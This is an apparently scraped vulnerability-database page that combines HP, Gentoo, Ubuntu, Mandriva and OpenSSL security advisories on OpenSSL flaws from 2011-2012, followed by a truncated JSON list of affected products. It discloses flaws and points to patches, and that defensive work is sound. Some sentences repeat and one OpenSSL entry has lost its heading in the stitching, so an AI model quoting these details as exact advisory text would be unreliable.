(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP System Management Homepage v7.1.1 or subsequent to resolve the vulnerabilities. HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e 8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HISTORY Version:1 (rev.1) 26 June 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk/p5ksACgkQ4B86/C0qfVkQpwCfbOEZmoo7myCkxQAdqQHevKG5 6IwAoPw4DI3YBCclyWuRekae7EFscAy0 =zd3u -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-12
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: March 06, 2012 Bugs: #397695, #399365 ID: 201203-12
Synopsis
Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to cause a Denial of Service or obtain sensitive information.
Background
OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.0g *>= 0.9.8t >= 1.0.0g
Description
Multiple vulnerabilities have been found in OpenSSL:
- Timing differences for decryption are exposed by CBC mode encryption in OpenSSL's implementation of DTLS (CVE-2011-4108).
- An incorrect fix for CVE-2011-4108 creates an unspecified vulnerability for DTLS applications using OpenSSL (CVE-2012-0050).
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0g"
References
[ 1 ] CVE-2011-4108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108 [ 2 ] CVE-2011-4109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109 [ 3 ] CVE-2011-4576 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576 [ 4 ] CVE-2011-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577 [ 5 ] CVE-2011-4619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619 [ 6 ] CVE-2012-0027 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027 [ 7 ] CVE-2012-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-1357-1 February 09, 2012
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Multiple vulnerabilities exist in OpenSSL that could expose sensitive information or cause applications to crash.
Software Description: - openssl: Secure Socket Layer (SSL) binary and related cryptographic tools
Details:
It was discovered that the elliptic curve cryptography (ECC) subsystem in OpenSSL, when using the Elliptic Curve Digital Signature Algorithm (ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement curves over binary fields. This could allow an attacker to determine private keys via a timing attack. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)
Adam Langley discovered that the ephemeral Elliptic Curve Diffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread safety while processing handshake messages from clients. This could allow a remote attacker to cause a denial of service via out-of-order messages that violate the TLS protocol. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-3210)
Nadhem Alfardan and Kenny Paterson discovered that the Datagram Transport Layer Security (DTLS) implementation in OpenSSL performed a MAC check only if certain padding is valid. This could allow a remote attacker to recover plaintext. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-4109)
It was discovered that OpenSSL, in certain circumstances involving ECDH or ECDHE cipher suites, used an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves. This could allow a remote attacker to obtain the private key of a TLS server via multiple handshake attempts. This issue only affected Ubuntu 8.04 LTS. (CVE-2011-4576)
Andrew Chi discovered that OpenSSL, when RFC 3779 support is enabled, could trigger an assert when handling an X.509 certificate containing certificate-extension data associated with IP address blocks or Autonomous System (AS) identifiers. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. This issue only affected Ubuntu 11.10. (CVE-2012-0027)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 11.10: libssl1.0.0 1.0.0e-2ubuntu4.2 openssl 1.0.0e-2ubuntu4.2
Ubuntu 11.04: libssl0.9.8 0.9.8o-5ubuntu1.2 openssl 0.9.8o-5ubuntu1.2
Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.6 openssl 0.9.8o-1ubuntu4.6
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.8 openssl 0.9.8k-7ubuntu8.8
Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.15 openssl 0.9.8g-4ubuntu3.15
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-1357-1 CVE-2011-1945, CVE-2011-3210, CVE-2011-4108, CVE-2011-4109, CVE-2011-4354, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2012-0027, CVE-2012-0050
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2 https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2 https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6 https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8 https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2012:007 http://www.mandriva.com/security/
Package : openssl Date : January 16, 2012 Affected: 2011.
The updated packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4109 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0027 http://www.openssl.org/news/secadv_20120104.txt
Updated Packages:
Mandriva Linux 2011: 2291c13c44539a5e25f58750a5d6bf8f 2011/i586/libopenssl1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm c610330d2c4c7397feb126247b1fa94f 2011/i586/libopenssl-devel-1.0.0d-2.2-mdv2011.0.i586.rpm 36c86a84320e1c8a17a74e4e68bc7d5a 2011/i586/libopenssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm 4b8054f2c169d2b3223195053bd15802 2011/i586/libopenssl-static-devel-1.0.0d-2.2-mdv2011.0.i586.rpm 3c48b209b941a83a6acfef439c3f78b7 2011/i586/openssl-1.0.0d-2.2-mdv2011.0.i586.rpm 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm
Mandriva Linux 2011/X86_64: 21a50bd2be83839266f033c9a0f0fabc 2011/x86_64/lib64openssl1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm 7e80ee8e2d445c5f1985cd52d2316658 2011/x86_64/lib64openssl-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm e1f4faa3162a6bbc14b37e4cb8d1e8e2 2011/x86_64/lib64openssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm 6e3ac6d57cf0f4e13ed8e275a9bd2ff8 2011/x86_64/lib64openssl-static-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm e9e0306f8dc9f398915a646547e262e2 2011/x86_64/openssl-1.0.0d-2.2-mdv2011.0.x86_64.rpm 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst eph27yO3eEECVX28+SNUKyw= =wTFq -----END PGP SIGNATURE----- .
DTLS Plaintext Recovery Attack (CVE-2011-4108)
Nadhem Alfardan and Kenny Paterson have discovered an extension of the Vaudenay padding oracle attack on CBC mode encryption which enables an efficient plaintext recovery attack against the OpenSSL implementation of DTLS. Their attack exploits timing differences arising during decryption processing. A research paper describing this attack can be found at http://www.isg.rhul.ac.uk/~kp/dtls.pdf
Thanks go to Nadhem Alfardan and Kenny Paterson of the Information Security Group at Royal Holloway, University of London (www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann seggelmann@fh-muenster.de and Michael Tuexen tuexen@fh-muenster.de for preparing the fix.
Affected users should upgrade to OpenSSL 1.0.0f or 0.9.8s.
Double-free in Policy Checks (CVE-2011-4109)
If X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy check failure can lead to a double-free. The bug does not occur unless this flag is set. Users of OpenSSL 1.0.0 are not affected.
This flaw was discovered by Ben Laurie and a fix provided by Emilia Kasper ekasper@google.com of Google.
Affected users should upgrade to OpenSSL 0.9.8s.
Uninitialized SSL 3.0 Padding (CVE-2011-4576)
OpenSSL prior to 1.0.0f and 0.9.8s failed to clear the bytes used as block cipher padding in SSL 3.0 records. This affects both clients and servers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with SSLv3_{server|client}method or SSLv23{server|client}_method. It does not affect TLS.
As a result, in each record, up to 15 bytes of uninitialized memory may be sent, encrypted, to the SSL peer. This could include sensitive contents of previously freed memory.
However, in practice, most deployments do not use SSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per connection. That write buffer is partially filled with non-sensitive, handshake data at the beginning of the connection and, thereafter, only records which are longer any any previously sent record leak any non-encrypted data. This, combined with the small number of bytes leaked per record, serves to limit to severity of this issue.
Thanks to Adam Langley agl@chromium.org for identifying and fixing this issue.
Affected users should upgrade to OpenSSL 1.0.0f or 0.9.8s.
Malformed RFC 3779 Data Can Cause Assertion Failures (CVE-2011-4577)
RFC 3779 data can be included in certificates, and if it is malformed, may trigger an assertion failure. This could be used in a denial-of-service attack.
Note, however, that in the standard release of OpenSSL, RFC 3779 support is disabled by default, and in this case OpenSSL is not vulnerable. Builds of OpenSSL are vulnerable if configured with "enable-rfc3779".
Thanks to Andrew Chi, BBN Technologies, for discovering the flaw, and Rob Austein sra@hactrn.net for fixing it.
Affected users should upgrade to OpenSSL 1.0.0f or 0.9.8s.
SGC Restart DoS Attack (CVE-2011-4619)
Support for handshake restarts for server gated cryptograpy (SGC) can be used in a denial-of-service attack.
Thanks to George Kadianakis desnacked@gmail.com for identifying this issue and to Adam Langley agl@chromium.org for fixing it.
Affected users should upgrade to OpenSSL 1.0.0f or 0.9.8s. This could be used in a denial-of-service attack.
Only users of the OpenSSL GOST ENGINE are affected by this bug.
Thanks to Andrey Kulikov amdeich@gmail.com for identifying and fixing this issue.
Affected users should upgrade to OpenSSL 1.0.0f.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20120104.txt
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0049", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.3" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.3a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.6b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0f" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", 